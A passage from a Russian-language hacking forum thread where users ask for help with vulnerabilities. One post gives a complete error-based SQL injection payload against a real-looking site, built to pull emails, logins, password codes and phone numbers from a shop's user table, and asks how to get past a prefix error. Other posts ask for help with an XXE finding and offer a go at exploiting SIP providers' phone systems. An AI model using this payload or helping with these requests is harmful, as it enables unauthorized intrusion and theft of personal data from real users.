Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    332
    Likes Received:
    511
    Reputations:
    157
    К сожалению, я могу лишь высказать предположение, так как не эксперт по AWS и не сталкивался с подобным случаем.
    По идее копироваться ничего не должно, тулза предназначена для монтирования удалённого хранилища. А по файлам, возможно, стоит глянуть в сторону AWS KMS и разобраться как оно работает, но это не точно :(
     
    Gorbachev likes this.
  2. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    159
    Likes Received:
    8
    Reputations:
    0
    Добрый подскажите касательно sql-inj:
    Хост/имя юзверя/название БД/Таблиц/Колонок - вытаскивается отлично (Как и в sqlmap|jSQL|так и ручками, через тот же Extractvalue)
    Но не дает вытянуть данные:
    Например при таком запросе (jSQL):
    Code:
    site.ru/maps.php?gorod=%c2%e8%ed%ed%e8%f6%e0'or(select+1+from(select+count(*),concat(((select+concat(0x53714c69,mid((select+concat(group_concat(0x04,r,0x05,q,0x04+order+by+r+separator+0x06),0x01030307)from(select+cast(concat(trim(ifnull(`add_group_id`,0x00)),0x7f,trim(ifnull(`email`,0x00)),0x7f,trim(ifnull(`group_id`,0x00)),0x7f,trim(ifnull(`id`,0x00)),0x7f,trim(ifnull(`is_provider_id`,0x00)),0x7f,trim(ifnull(`login`,0x00)),0x7f,trim(ifnull(`name`,0x00)),0x7f,trim(ifnull(`pass_code`,0x00)),0x7f,trim(ifnull(`phone`,0x00)))as+char)r,cast(count(*)as+char)q+from`uzver_frontenda`.`MS_user_shop`group+by+r+limit+0,65536)x),1,64)))),floor(rand(0)*2))from+information_schema.tables+group+by+2)x)or'--+
    В ответ:
    Code:
    Error occured, script stoped
    Error type: Parser Error  Source, line: Parser[359]  Error: Wrong prefix in table name!
    Error information:
     Use key {DBNICK} to set prefix key for table: MS_user_shop 
    Доп данные:
    CMS: Melbis Shop
    Web: PHP 5.3.3, Apache 2.2.22
    Mysql: 5.1.73-log
    Is DBA: False
     
  3. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    404
    Likes Received:
    65
    Reputations:
    18
    Что за дич нашел бурп как раскрутить? кто может помоч?
    Изучил https://exploitstube.com/sql-injection-abusing-xxe-in-oracle.html
    Помогите вектор наити а то на снифере приходи пустота, скину прив
     
    #2383 Octavian, 17 Jun 2018 at 4:57 PM
    Last edited: 17 Jun 2018 at 6:36 PM
  4. Ori

    Ori Member

    Joined:
    14 Sep 2016
    Messages:
    21
    Likes Received:
    18
    Reputations:
    1
    Кто хочет попробовать себя в эксплуатации виртуальных АТС SIP провайдеров? Иметь дело предстоит с консольным урезанным линуксом. Предложение ограничено)
     
  5. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    825
    Likes Received:
    987
    Reputations:
    69
    Научишь?
     
Loading...